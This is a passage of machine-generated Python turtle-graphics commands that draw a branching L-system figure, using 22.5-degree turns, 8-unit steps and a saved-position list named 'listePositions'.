pu(), setposition((78.55,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((89.86,141.82), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((89.86,141.82), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((104.64,147.94), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((104.64,147.94)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((104.64,147.94), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((104.64,147.94)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((120.64,147.94), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((120.64,147.94)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((120.64,147.94), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((120.64,147.94)), setheading(0.0) ;
pu(), setposition((78.55,130.50)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((89.86,141.82), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((89.86,141.82), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.18,153.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.18,153.13)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((117.18,153.13), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.18,153.13)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((117.18,153.13), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.18,153.13)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((131.96,159.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.96,159.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((131.96,159.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.96,159.25)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((143.27,170.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.27,170.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 22.5), ((143.27,170.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.27,170.57)), setheading(45.0) ;
pu(), setposition((101.18,153.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((107.30,167.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.30,167.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((107.30,167.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.30,167.91)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((118.61,179.23), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.61,179.23)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((118.61,179.23), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.61,179.23)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((133.39,185.35), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((133.39,185.35)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((101.18,153.13), 45.0), ((133.39,185.35), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((133.39,185.35)), setheading(22.5) ;
pu(), setposition((101.18,153.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((107.30,167.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.30,167.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((107.30,167.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.30,167.91)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.42,182.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.42,182.69)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((128.20,188.82), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((128.20,188.82)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((128.20,188.82), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((128.20,188.82)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((139.52,200.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((139.52,200.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((139.52,200.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((139.52,200.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((145.64,214.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.64,214.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 45.0), ((145.64,214.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.64,214.91)), setheading(67.5) ;
pu(), setposition((113.42,182.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((113.42,198.69), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.42,198.69)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((113.42,198.69), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.42,198.69)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((119.54,213.48), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.54,213.48)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((119.54,213.48), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.54,213.48)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((130.86,224.79), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.86,224.79)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((113.42,182.69), 67.5), ((130.86,224.79), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.86,224.79)), setheading(45.0) ;
pu(), setposition((113.42,182.69)), setheading(67.5) ;
pu(), setposition((48.98,118.26)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,150.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,150.26)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((60.30,161.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,161.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((60.30,161.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,161.57)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,176.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,176.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,176.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,176.35)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,192.35), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,192.35)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,192.35), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,192.35)), setheading(90.0) ;
pu(), setposition((48.98,150.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,165.04), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,165.04)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,165.04), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,165.04)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,181.04), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,181.04)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,181.04), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,181.04)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((48.98,195.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,195.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((48.98,195.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,195.82)), setheading(67.5) ;
pu(), setposition((48.98,150.26)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,165.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,165.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,165.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,165.04)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,179.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,179.82)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((76.01,185.94), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.01,185.94)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((76.01,185.94), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.01,185.94)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((87.33,197.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.33,197.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((87.33,197.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.33,197.26)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((93.45,212.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.45,212.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 45.0), ((93.45,212.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.45,212.04)), setheading(67.5) ;
pu(), setposition((61.23,179.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((61.23,195.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,195.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((61.23,195.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,195.82)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((67.35,210.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,210.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((67.35,210.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,210.60)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((78.67,221.92), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.67,221.92)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((78.67,221.92), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.67,221.92)), setheading(45.0) ;
pu(), setposition((61.23,179.82)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((72.54,191.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((72.54,191.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((72.54,191.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((72.54,191.13)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,202.45)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,202.45)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((99.86,202.45), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.86,202.45)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((99.86,202.45), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.86,202.45)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((114.64,208.57), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.64,208.57)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((114.64,208.57), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.64,208.57)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((125.95,219.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.95,219.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((125.95,219.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.95,219.88)), setheading(45.0) ;
pu(), setposition((83.86,202.45)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((89.98,217.23), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
